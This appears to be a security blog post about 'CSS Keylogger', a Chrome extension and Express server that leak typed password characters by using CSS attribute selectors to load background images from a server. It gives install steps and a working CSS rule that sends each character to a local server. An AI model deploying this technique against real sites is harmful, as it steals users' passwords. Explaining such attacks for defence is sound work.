CSS Keylogger is a Chrome extension and Express server that exploits keylogging abilities of CSS. Using a simple script one can create a css file that will send a custom request for every ASCII character.
git clone https://github.com/maxchehab/CSS-Keylogging
chrome://extensions
in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).Load unpacked extension…
to pop up a file-selection dialog.css-keylogger-extension
in the directory which you downloaded this repository.Also Read Volatility Framework – Volatile memory extraction utility framework
yarn
yarn start
C
on the top right of any webpage.This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image
.
For example, the following css will select all input’s with a type
that equals password
and a value
that ends with a
. It will then try to load an image from here.
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…